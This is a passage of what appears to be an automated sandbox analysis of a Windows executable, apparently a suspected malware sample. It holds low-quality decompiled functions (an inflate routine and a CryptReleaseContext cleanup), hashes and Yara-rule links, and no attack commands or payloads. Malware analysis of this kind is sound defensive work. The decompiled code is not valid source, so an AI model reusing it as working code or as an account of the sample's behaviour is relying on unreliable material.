							 *(__esi + 0x1c) =  *(__ebp + 0xc);
							__eax =  *(__ebp - 4);
							__edi[1] =  *(__ebp - 4);
							__ebx = __ebx -  *__edi;
							 *__edi = __ebx;
							__edi[2] = __edi[2] + __ebx -  *__edi;
							__eax =  *(__ebp - 8);
							 *(__esi + 0x34) =  *(__ebp - 8);
							goto L100;
						}
						__eax = E00403CC8( *(__ebp - 0x14),  *(__ebp - 0x10),  *((intOrPtr*)(__ebp - 0x2c)),  *(__ebp - 0x28), __edi);
						__eflags = __eax;
						if(__eax == 0) {
							L116:
							_push(0xfffffffc);
							_t488[8] =  *(_t490 + 8);
							_t488[7] =  *(_t490 + 0xc);
							 *(_t485 + 4) =  *(_t490 - 4);
							 *_t485 = _t476;
							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
							_t488[0xd] =  *(_t490 - 8);
							goto L100;
						}
						 *(__esi + 4) = __eax;
						__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
						_pop(__ecx);
						 *__esi = 6;
						_pop(__ecx);
						goto L92;
						L58:
						 *(__esi + 4) =  *(__esi + 4) >> 0xa;
						__eax = ( *(__esi + 4) >> 0xa) + 4;
						__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
						if( *(__esi + 8) >= ( *(__esi + 4) >> 0xa) + 4) {
							while(1) {
								L64:
								__eflags =  *(__esi + 8) - 0x13;
								if( *(__esi + 8) >= 0x13) {
									break;
								}
								__eax =  *(__esi + 8);
								__ecx =  *(__esi + 0xc);
								 *(__ecx +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) & 0x00000000;
								 *(__esi + 8) =  *(__esi + 8) + 1;
							}
							__ecx = __esi + 0x14;
							__eax = __esi + 0x10;
							 *(__esi + 0x10) = 7;
							__eax = E00404FA0( *(__esi + 0xc), __eax, __ecx,  *((intOrPtr*)(__esi + 0x24)), __edi);
							 *(__ebp - 0xc) = __eax;
							__eflags = __eax;
							if(__eax != 0) {
								__eflags =  *(__ebp - 0xc) - 0xfffffffd;
								goto L113;
							}
							_t182 = __esi + 8;
							 *_t182 =  *(__esi + 8) & __eax;
							__eflags =  *_t182;
							 *__esi = 5;
							goto L68;
						} else {
							goto L59;
						}
						do {
							L59:
							__ecx =  *(__ebp + 0xc);
							while(1) {
								__eflags = __ecx - 3;
								if(__ecx >= 3) {
									goto L63;
								}
								__eflags =  *(__ebp - 4);
								if( *(__ebp - 4) == 0) {
									goto L107;
								}
								__eax =  *__ebx & 0x000000ff;
								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
								 *(__ebp - 4) =  *(__ebp - 4) - 1;
								__eax = ( *__ebx & 0x000000ff) << __cl;
								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
								__ebx = __ebx + 1;
								__ecx = __ecx + 8;
								 *(__ebp + 0xc) = __ecx;
							}
							L63:
							__ecx =  *(__esi + 8);
							__eax =  *(__ebp + 8);
							__edx =  *(__esi + 0xc);
							__eax =  *(__ebp + 8) & 0x00000007;
							__ecx =  *(0x40cdf0 +  *(__esi + 8) * 4);
							 *(__ebp + 0xc) =  *(__ebp + 0xc) - 3;
							 *(__ebp + 8) =  *(__ebp + 8) >> 3;
							 *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *(__ebp + 8) & 0x00000007;
							__ecx =  *(__esi + 4);
							 *(__esi + 8) =  *(__esi + 8) + 1;
							__eax =  *(__esi + 8);
							 *(__esi + 4) >> 0xa = ( *(__esi + 4) >> 0xa) + 4;
							__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
						} while ( *(__esi + 8) < ( *(__esi + 4) >> 0xa) + 4);
						goto L64;
						L50:
						__ecx =  *(__ebp + 0xc);
						while(1) {
							__eflags = __ecx - 0xe;
							if(__ecx >= 0xe) {
								break;
							}
							__eflags =  *(__ebp - 4);
							if( *(__ebp - 4) == 0) {
								goto L107;
							}
							__eax =  *__ebx & 0x000000ff;
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							 *(__ebp - 4) =  *(__ebp - 4) - 1;
							__eax = ( *__ebx & 0x000000ff) << __cl;
							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
							__ebx = __ebx + 1;
							__ecx = __ecx + 8;
							 *(__ebp + 0xc) = __ecx;
						}
						__eax =  *(__ebp + 8);
						__eax =  *(__ebp + 8) & 0x00003fff;
						__ecx = __eax;
						 *(__esi + 4) = __eax;
						__ecx = __eax & 0x0000001f;
						__eflags = __ecx - 0x1d;
						if(__ecx > 0x1d) {
							L109:
							 *__esi = 9;
							__edi[6] = "too many length or distance symbols";
							break;
						}
						__eax = __eax & 0x000003e0;
						__eflags = (__eax & 0x000003e0) - 0x3a0;
						if((__eax & 0x000003e0) > 0x3a0) {
							goto L109;
						}
						__eax = __eax >> 5;
						__eax = __eax & 0x0000001f;
						__eax = __edi[8](__edi[0xa], __eax, 4);
						__esp = __esp + 0xc;
						 *(__esi + 0xc) = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							goto L116;
						}
						 *(__ebp + 8) =  *(__ebp + 8) >> 0xe;
						 *(__ebp + 0xc) =  *(__ebp + 0xc) - 0xe;
						_t138 = __esi + 8;
						 *_t138 =  *(__esi + 8) & 0x00000000;
						__eflags =  *_t138;
						 *__esi = 4;
						goto L58;
						L27:
						__eflags =  *(__ebp - 4);
						if( *(__ebp - 4) == 0) {
							goto L107;
						}
						__eflags = __ecx;
						if(__ecx != 0) {
							L44:
							__eax =  *(__esi + 4);
							__ecx =  *(__ebp - 4);
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							__eflags = __eax - __ecx;
							 *(__ebp - 0xc) = __eax;
							if(__eax > __ecx) {
								 *(__ebp - 0xc) = __ecx;
							}
							__eax =  *(__ebp - 0x10);
							__eflags =  *(__ebp - 0xc) - __eax;
							if( *(__ebp - 0xc) > __eax) {
								 *(__ebp - 0xc) = __eax;
							}
							__eax = memcpy( *(__ebp - 8), __ebx,  *(__ebp - 0xc));
							__eax =  *(__ebp - 0xc);
							__esp = __esp + 0xc;
							 *(__ebp - 4) =  *(__ebp - 4) - __eax;
							 *(__ebp - 8) =  *(__ebp - 8) + __eax;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __eax;
							__ebx = __ebx + __eax;
							_t115 = __esi + 4;
							 *_t115 =  *(__esi + 4) - __eax;
							__eflags =  *_t115;
							if( *_t115 == 0) {
								L49:
								 *(__esi + 0x18) =  ~( *(__esi + 0x18));
								asm("sbb eax, eax");
								__eax =  ~( *(__esi + 0x18)) & 0x00000007;
								L16:
								 *_t488 = _t456;
							}
							goto L98;
						}
						__ecx =  *(__esi + 0x2c);
						__eflags = __edx - __ecx;
						if(__edx != __ecx) {
							L35:
							__eax =  *(__ebp - 8);
							 *(__esi + 0x34) =  *(__ebp - 8);
							__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
							__ecx =  *(__esi + 0x30);
							 *(__ebp + 0x10) = __eax;
							__eax =  *(__esi + 0x34);
							__eflags = __eax - __ecx;
							 *(__ebp - 8) = __eax;
							if(__eax >= __ecx) {
								__edx =  *(__esi + 0x2c);
								__edx =  *(__esi + 0x2c) -  *(__ebp - 8);
								__eflags = __edx;
								 *(__ebp - 0x10) = __edx;
							} else {
								__ecx = __ecx -  *(__ebp - 8);
								__eax = __ecx -  *(__ebp - 8) - 1;
								 *(__ebp - 0x10) = __ecx -  *(__ebp - 8) - 1;
							}
							__edx =  *(__esi + 0x2c);
							__eflags =  *(__ebp - 8) - __edx;
							if( *(__ebp - 8) == __edx) {
								__eax =  *(__esi + 0x28);
								__eflags = __eax - __ecx;
								if(__eflags != 0) {
									 *(__ebp - 8) = __eax;
									if(__eflags >= 0) {
										__edx = __edx - __eax;
										__eflags = __edx;
										 *(__ebp - 0x10) = __edx;
									} else {
										__ecx = __ecx - __eax;
										__ecx = __ecx - 1;
										 *(__ebp - 0x10) = __ecx;
									}
								}
							}
							__eflags =  *(__ebp - 0x10);
							if( *(__ebp - 0x10) == 0) {
								__eax =  *(__ebp + 8);
								 *(__esi + 0x20) =  *(__ebp + 8);
								__eax =  *(__ebp + 0xc);
								 *(__esi + 0x1c) =  *(__ebp + 0xc);
								__eax =  *(__ebp - 4);
								__edi[1] =  *(__ebp - 4);
								goto L108;
							} else {
								goto L44;
							}
						}
						__eax =  *(__esi + 0x30);
						__edx =  *(__esi + 0x28);
						__eflags = __edx - __eax;
						if(__eflags == 0) {
							goto L35;
						}
						 *(__ebp - 8) = __edx;
						if(__eflags >= 0) {
							__ecx = __ecx - __edx;
							__eflags = __ecx;
							 *(__ebp - 0x10) = __ecx;
						} else {
							__eax = __eax - __edx;
							 *(__ebp - 0x10) = __eax;
						}
						__eflags =  *(__ebp - 0x10);
						if( *(__ebp - 0x10) != 0) {
							goto L44;
						} else {
							goto L35;
						}
						L20:
						__ecx =  *(__ebp + 0xc);
						while(1) {
							__eflags = __ecx - 0x20;
							if(__ecx >= 0x20) {
								break;
							}
							__eflags =  *(__ebp - 4);
							if( *(__ebp - 4) == 0) {
								goto L107;
							}
							__eax =  *__ebx & 0x000000ff;
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							 *(__ebp - 4) =  *(__ebp - 4) - 1;
							__eax = ( *__ebx & 0x000000ff) << __cl;
							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
							__ebx = __ebx + 1;
							__ecx = __ecx + 8;
							 *(__ebp + 0xc) = __ecx;
						}
						__ecx =  *(__ebp + 8);
						__eax =  *(__ebp + 8);
						__ecx =  !( *(__ebp + 8));
						__eax =  *(__ebp + 8) & 0x0000ffff;
						__ecx =  !( *(__ebp + 8)) >> 0x10;
						__ecx =  !( *(__ebp + 8)) >> 0x00000010 ^ __eax;
						__eflags = __ecx;
						if(__ecx != 0) {
							 *__esi = 9;
							__edi[6] = "invalid stored block lengths";
							break;
						}
						 *(__esi + 4) = __eax;
						__eax = 0;
						__eflags =  *(__esi + 4);
						 *(__ebp + 0xc) = 0;
						 *(__ebp + 8) = 0;
						if( *(__esi + 4) == 0) {
							goto L49;
						}
						__eax = 2;
						goto L16;
						L7:
						while( *(_t490 + 0xc) < 3) {
							if( *(_t490 - 4) == 0) {
								goto L107;
							}
							_t479 =  *(_t490 + 0xc);
							 *(_t490 + 0x10) =  *(_t490 + 0x10) & 0x00000000;
							 *(_t490 - 4) =  *(_t490 - 4) - 1;
							 *(_t490 + 8) =  *(_t490 + 8) | ( *_t476 & 0x000000ff) <<  *(_t490 + 0xc);
							_t476 =  &(_t476[1]);
							 *(_t490 + 0xc) =  *(_t490 + 0xc) + 8;
						}
						_t436 =  *(_t490 + 8) & 0x00000007;
						_t479 = _t436 & 0x00000001;
						_t438 = _t436 >> 1;
						__eflags = _t438;
						_t488[6] = _t436 & 0x00000001;
						if(_t438 == 0) {
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
							 *_t488 = 1;
							_t479 =  *(_t490 + 0xc) & 0x00000007;
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - _t479;
							 *(_t490 + 8) =  *(_t490 + 8) >> 3 >> _t479;
							goto L98;
						}
						_t442 = _t438 - 1;
						__eflags = _t442;
						if(_t442 == 0) {
							_push(_t485);
							E00405122(_t490 - 0x24, _t490 - 0x20, _t490 - 0x1c, _t490 - 0x18);
							_t448 = E00403CC8( *((intOrPtr*)(_t490 - 0x24)),  *((intOrPtr*)(_t490 - 0x20)),  *((intOrPtr*)(_t490 - 0x1c)),  *((intOrPtr*)(_t490 - 0x18)), _t485);
							_t493 = _t493 + 0x28;
							_t488[1] = _t448;
							__eflags = _t448;
							if(_t448 == 0) {
								goto L116;
							}
							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
							 *_t488 = 6;
							goto L98;
						}
						_t455 = _t442 - 1;
						__eflags = _t455;
						if(_t455 == 0) {
							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
							_t456 = 3;
							_t33 = _t490 + 0xc;
							 *_t33 =  *(_t490 + 0xc) - _t456;
							__eflags =  *_t33;
							goto L16;
						}
						__eflags = _t455 == 1;
						if(_t455 == 1) {
							 *_t488 = 9;
							 *(_t485 + 0x18) = "invalid block type";
							_t488[8] =  *(_t490 + 8) >> 3;
							_t461 =  *(_t490 + 0xc) + 0xfffffffd;
							L105:
							_t488[7] = _t461;
							 *(_t485 + 4) =  *(_t490 - 4);
							 *_t485 = _t476;
							_push(0xfffffffd);
							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
							_t488[0xd] =  *(_t490 - 8);
							goto L100;
						}
						goto L98;
					}
					L104:
					__eax =  *(__ebp + 8);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__eax =  *(__ebp + 0xc);
					goto L105;
					L122:
					__eax =  *(__ebp + 8);
					_push(1);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__eax =  *(__ebp + 0xc);
					 *(__esi + 0x1c) =  *(__ebp + 0xc);
					__eax =  *(__ebp - 4);
					__edi[1] =  *(__ebp - 4);
					__ebx = __ebx -  *__edi;
					 *__edi = __ebx;
					__edi[2] = __edi[2] + __ebx -  *__edi;
					__eax =  *(__ebp - 8);
					 *(__esi + 0x34) =  *(__ebp - 8);
					goto L100;
					L118:
					__eax =  *(__ebp - 8);
					 *(__esi + 0x34) =  *(__ebp - 8);
					__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
					__ecx =  *(__esi + 0x34);
					__eflags =  *(__esi + 0x30) - __ecx;
					 *(__ebp - 8) = __ecx;
					if( *(__esi + 0x30) == __ecx) {
						 *__esi = 8;
						goto L122;
					}
					__ecx =  *(__ebp + 8);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__ecx =  *(__ebp + 0xc);
					 *(__esi + 0x1c) =  *(__ebp + 0xc);
					__ecx =  *(__ebp - 4);
					__edi[1] =  *(__ebp - 4);
					__ebx = __ebx -  *__edi;
					 *__edi = __ebx;
					_t409 =  &(__edi[2]);
					 *_t409 = __edi[2] + __ebx -  *__edi;
					__eflags =  *_t409;
					__ecx =  *(__ebp - 8);
					 *(__esi + 0x34) = __ecx;
					goto L120;
				}
			}

0x004043b7
0x004043b9
0x004043be
0x004043c2
0x004043c5
0x004043cb
0x004043cd
0x004043d3
0x004043d9
0x004043dc
0x004043e1
0x004043e4
0x004043f0
0x004043f0
0x004043e6
0x004043e9
0x004043e9
0x004043f2
0x004043f4
0x004043fa
0x004049c2
0x004049c5
0x004049c7
0x004049cd
0x004049d3
0x004049da
0x004049dc
0x004049dc
0x004049dc
0x004049e2
0x00000000
0x00404400
0x00404408
0x00404408
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404935
0x00404935
0x0040493b
0x0040493e
0x00404941
0x00404944
0x00404947
0x0040494c
0x0040494f
0x00404952
0x00404955
0x00404958
0x0040495b
0x00404963
0x00404966
0x00404b89
0x00404b89
0x004049e5
0x004049e5
0x004049e6
0x004049e7
0x004049ef
0x004049f3
0x004049f3
0x0040496c
0x00404979
0x0040497c
0x0040497e
0x00404981
0x00404984
0x00404985
0x00404988
0x0040498b
0x0040498c
0x0040498f
0x00404992
0x00404995
0x00404998
0x0040499a
0x004049a1
0x004049a4
0x004049a4
0x0040499c
0x0040499c
0x0040499e
0x0040499e
0x004049a7
0x004049ab
0x004049ae
0x00404b44
0x00000000
0x004049b4
0x004049b4
0x004049b4
0x004049b7
0x004049b7
0x004049b9
0x004049bc
0x00404402
0x00000000
0x00404405
0x00000000
0x004049bc
0x0040476e
0x0040476e
0x0040476e
0x00404771
0x00404774
0x00404776
0x00404779
0x0040477c
0x0040477f
0x0040477f
0x00404786
0x00404788
0x00000000
0x00000000
0x0040478e
0x00404791
0x00404791
0x00404794
0x00000000
0x00000000
0x00404796
0x0040479a
0x00404a58
0x00404a5b
0x00404a61
0x00404a64
0x00404a64
0x00404a64
0x00404a68
0x00404a6a
0x00404a6f
0x00404a71
0x00404a77
0x00000000
0x00404a77
0x004047a0
0x004047a3
0x004047a6
0x004047aa
0x004047ad
0x004047af
0x004047b2
0x004047b3
0x004047b3
0x004047b9
0x004047c0
0x004047c3
0x004047c6
0x004047ca
0x004047cd
0x004047d0
0x004047d3
0x004047d7
0x004047da
0x004047f5
0x004047f8
0x004047ff
0x004047ff
0x004047fa
0x004047fc
0x004047fc
0x00404802
0x00404804
0x0040480a
0x0040480b
0x0040480e
0x0040480e
0x00404811
0x00404814
0x00404814
0x00404817
0x0040481a
0x0040481d
0x00000000
0x00000000
0x0040481f
0x00404823
0x00000000
0x00000000
0x00404829
0x0040482c
0x0040482f
0x00404833
0x00404836
0x00404838
0x0040483b
0x0040483c
0x0040483c
0x00404842
0x0040484c
0x0040484f
0x00404852
0x00404854
0x00404857
0x0040485a
0x0040485c
0x0040485f
0x00404862
0x00404865
0x00404867
0x0040486a
0x0040486d
0x00404870
0x00404870
0x0040487a
0x0040487c
0x0040487e
0x00404a94
0x00404a9d
0x00404aa0
0x00404aa6
0x00404aad
0x00404ab0
0x00404ab5
0x00404ab8
0x00404abb
0x00404ac0
0x00404ac3
0x00404ac6
0x00404ac9
0x00404acc
0x00404acf
0x00000000
0x00404ad4
0x00404884
0x00404888
0x0040489c
0x0040489c
0x0040489e
0x0040489e
0x0040489e
0x004048a1
0x004048a4
0x004048a5
0x004048a5
0x004048a5
0x004048a5
0x004048aa
0x00000000
0x004048aa
0x0040488a
0x0040488d
0x00000000
0x00000000
0x00404893
0x00404896
0x00000000
0x00404896
0x004047dc
0x004047df
0x004047e1
0x004047e4
0x004047e7
0x004047ea
0x004047ed
0x004047ed
0x004048b3
0x004048b9
0x004048bc
0x004048c0
0x004048cc
0x004048d0
0x004048d4
0x004048d9
0x004048dc
0x004048df
0x004048e2
0x004048e7
0x004048e8
0x004048f1
0x004048f9
0x004048fc
0x004048fe
0x00404adc
0x00404ae0
0x00404ae0
0x00404ae8
0x00404aeb
0x00404aec
0x00404af2
0x00404af2
0x00404af3
0x00404af6
0x00404af9
0x00404afc
0x00404aff
0x00404b02
0x00404b05
0x00404b0a
0x00404b0c
0x00404b0e
0x00404b11
0x00404b14
0x00000000
0x00404b14
0x00404911
0x00404919
0x0040491b
0x00404b1c
0x00404b1f
0x00404b21
0x00404b27
0x00404b2d
0x00404b34
0x00404b36
0x00404b3c
0x00000000
0x00404b3c
0x00404924
0x0040492a
0x0040492d
0x0040492e
0x00404934
0x00000000
0x004046b8
0x004046bb
0x004046be
0x004046c1
0x004046c4
0x00404721
0x00404721
0x00404721
0x00404725
0x00000000
0x00000000
0x00404727
0x0040472a
0x00404734
0x00404738
0x00404738
0x0040473e
0x00404744
0x0040474c
0x00404752
0x0040475a
0x0040475d
0x0040475f
0x00404a8e
0x00000000
0x00404a8e
0x00404765
0x00404765
0x00404765
0x00404768
0x00000000
0x00000000
0x00000000
0x00000000
0x004046c6
0x004046c6
0x004046c6
0x004046c9
0x004046c9
0x004046cc
0x00000000
0x00000000
0x004046ce
0x004046d2
0x00000000
0x00000000
0x004046d8
0x004046db
0x004046df
0x004046e2
0x004046e4
0x004046e7
0x004046e8
0x004046eb
0x004046eb
0x004046f0
0x004046f0
0x004046f3
0x004046f6
0x004046f9
0x004046fc
0x00404703
0x00404707
0x0040470b
0x0040470e
0x00404711
0x00404714
0x0040471a
0x0040471d
0x0040471d
0x00000000
0x0040462b
0x0040462b
0x0040462e
0x0040462e
0x00404631
0x00000000
0x00000000
0x00404633
0x00404637
0x00000000
0x00000000
0x0040463d
0x00404640
0x00404644
0x00404647
0x00404649
0x0040464c
0x0040464d
0x00404650
0x00404650
0x00404655
0x00404658
0x0040465d
0x0040465f
0x00404662
0x00404665
0x00404668
0x00404a7f
0x00404a7f
0x00404a85
0x00000000
0x00404a85
0x00404670
0x00404676
0x0040467c
0x00000000
0x00000000
0x00404682
0x00404685
0x00404695
0x00404698
0x0040469b
0x0040469e
0x004046a0
0x00000000
0x00000000
0x004046a6
0x004046aa
0x004046ae
0x004046ae
0x004046ae
0x004046b2
0x00000000
0x0040453a
0x0040453a
0x0040453e
0x00000000
0x00000000
0x00404544
0x00404546
0x004045d7
0x004045d7
0x004045da
0x004045dd
0x004045e1
0x004045e3
0x004045e6
0x004045e8
0x004045e8
0x004045eb
0x004045ee
0x004045f1
0x004045f3
0x004045f3
0x004045fd
0x00404602
0x00404605
0x00404608
0x0040460b
0x0040460e
0x00404611
0x00404613
0x00404613
0x00404613
0x00404616
0x0040461c
0x0040461f
0x00404621
0x00404623
0x00404469
0x00404469
0x00404469
0x00000000
0x00404616
0x0040454c
0x0040454f
0x00404551
0x00404575
0x00404578
0x0040457b
0x00404580
0x00404585
0x00404588
0x0040458b
0x00404591
0x00404593
0x00404596
0x004045a3
0x004045a6
0x004045a6
0x004045a9
0x00404598
0x0040459a
0x0040459d
0x0040459e
0x0040459e
0x004045ac
0x004045af
0x004045b2
0x004045b4
0x004045b7
0x004045b9
0x004045bb
0x004045be
0x004045c8
0x004045c8
0x004045ca
0x004045c0
0x004045c0
0x004045c2
0x004045c3
0x004045c3
0x004045be
0x004045b9
0x004045cd
0x004045d1
0x00404a44
0x00404a47
0x00404a4a
0x00404a4d
0x00404a50
0x00404a53
0x00000000
0x00000000
0x00000000
0x00000000
0x004045d1
0x00404553
0x00404556
0x00404559
0x0040455b
0x00000000
0x00000000
0x0040455d
0x00404560
0x0040456a
0x0040456a
0x0040456c
0x00404562
0x00404562
0x00404565
0x00404565
0x0040456f
0x00404573
0x00000000
0x00000000
0x00000000
0x00000000
0x004044dc
0x004044dc
0x004044df
0x004044df
0x004044e2
0x00000000
0x00000000
0x004044e4
0x004044e8
0x00000000
0x00000000
0x004044ee
0x004044f1
0x004044f5
0x004044f8
0x004044fa
0x004044fd
0x004044fe
0x00404501
0x00404501
0x00404506
0x00404509
0x0040450c
0x0040450e
0x00404513
0x00404516
0x00404516
0x00404518
0x00404a12
0x00404a18
0x00000000
0x00404a18
0x0040451e
0x00404521
0x00404523
0x00404526
0x00404529
0x0040452c
0x00000000
0x00000000
0x00404534
0x00000000
0x00000000
0x0040440f
0x00404419
0x00000000
0x00000000
0x00404422
0x00404425
0x00404429
0x0040442e
0x00404431
0x00404432
0x00404432
0x0040443b
0x00404442
0x00404445
0x00404445
0x00404448
0x0040444b
0x004044b9
0x004044c3
0x004044c9
0x004044d1
0x004044d4
0x00000000
0x004044d4
0x0040444d
0x0040444d
0x0040444e
0x00404473
0x00404481
0x00404493
0x00404498
0x0040449b
0x0040449e
0x004044a0
0x00000000
0x00000000
0x004044a6
0x004044aa
0x004044ae
0x00000000
0x004044ae
0x00404450
0x00404450
0x00404451
0x0040445f
0x00404465
0x00404466
0x00404466
0x00404466
0x00000000
0x00404466
0x00404453
0x00404454
0x004049f7
0x00404a00
0x00404a07
0x00404a0d
0x00404a28
0x00404a28
0x00404a2e
0x00404a35
0x00404a37
0x00404a39
0x00404a3f
0x00000000
0x00404a3f
0x00000000
0x0040445a
0x00404a1f
0x00404a1f
0x00404a22
0x00404a25
0x00000000
0x00404b95
0x00404b95
0x00404b98
0x00404b9a
0x00404b9d
0x00404ba0
0x00404ba3
0x00404ba6
0x00404bab
0x00404bad
0x00404baf
0x00404bb2
0x00404bb5
0x00000000
0x00404b4a
0x00404b4d
0x00404b50
0x00404b55
0x00404b5a
0x00404b60
0x00404b63
0x00404b66
0x00404b8f
0x00000000
0x00404b8f
0x00404b68
0x00404b6b
0x00404b6e
0x00404b71
0x00404b74
0x00404b77
0x00404b7c
0x00404b7e
0x00404b80
0x00404b80
0x00404b80
0x00404b83
0x00404b86
0x00000000
0x00404b86

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
Instruction ID: 90343a8667ee0670e87e021bba3e221c8adc0c1da1bb1a76252bfdf766af77e9
Opcode Fuzzy Hash: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
Instruction Fuzzy Hash: FB520CB5900609EFCB14CF69C580AAABBF1FF49315F10852EE95AA7780D338EA55CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004018B9 Relevance: 1.5, APIs: 1, Instructions: 25
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E004018B9(void* __ecx) {
				signed int _t10;
				signed int _t11;
				long* _t12;
				void* _t13;
				void* _t18;

				_t18 = __ecx;
				_t10 =  *(__ecx + 8);
				if(_t10 != 0) {
					 *0x40f89c(_t10);
					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				}
				_t11 =  *(_t18 + 0xc);
				if(_t11 != 0) {
					 *0x40f89c(_t11);
					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
				}
				_t12 =  *(_t18 + 4);
				if(_t12 != 0) {
					CryptReleaseContext(_t12, 0);
					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
				}
				_t13 = 1;
				return _t13;
			}

0x004018ba
0x004018bc
0x004018c1
0x004018c4
0x004018ca
0x004018ca
0x004018ce
0x004018d3
0x004018d6
0x004018dc
0x004018dc
0x004018e0
0x004018e5
0x004018ea
0x004018f0
0x004018f0
0x004018f6
0x004018f8

APIs

CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58

Uniqueness

Uniqueness Score: -1.00%

Function 00404C19 Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00404C19(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32, signed int* _a36, signed char* _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char* _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				void* _v40;
				char _v43;
				signed char _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v180;
				signed int _v184;
				signed int _v244;
				signed int _t190;
				intOrPtr* _t192;
				signed int _t193;
				void* _t194;
				void* _t195;
				signed int _t196;
				signed int _t199;
				intOrPtr _t203;
				intOrPtr _t207;
				signed char* _t211;
				signed char _t212;
				signed int _t214;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				intOrPtr* _t220;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t228;
				intOrPtr _t229;
				signed int _t231;
				char _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t241;
				signed int _t242;
				intOrPtr _t243;
				signed int* _t244;
				signed int _t246;
				signed int _t247;
				signed int* _t248;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				signed int _t252;
				signed char _t257;
				signed int _t266;
				signed int _t269;
				signed char _t271;
				intOrPtr _t275;
				signed char* _t277;
				signed int _t280;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr* _t287;
				intOrPtr _t294;
				signed int _t296;
				intOrPtr* _t297;
				intOrPtr _t298;
				intOrPtr _t300;
				signed char _t302;
				void* _t306;
				signed int _t307;
				signed int _t308;
				intOrPtr* _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t319;
				intOrPtr _t320;
				unsigned int _t321;
				intOrPtr* _t322;
				void* _t323;

				_t248 = _a4;
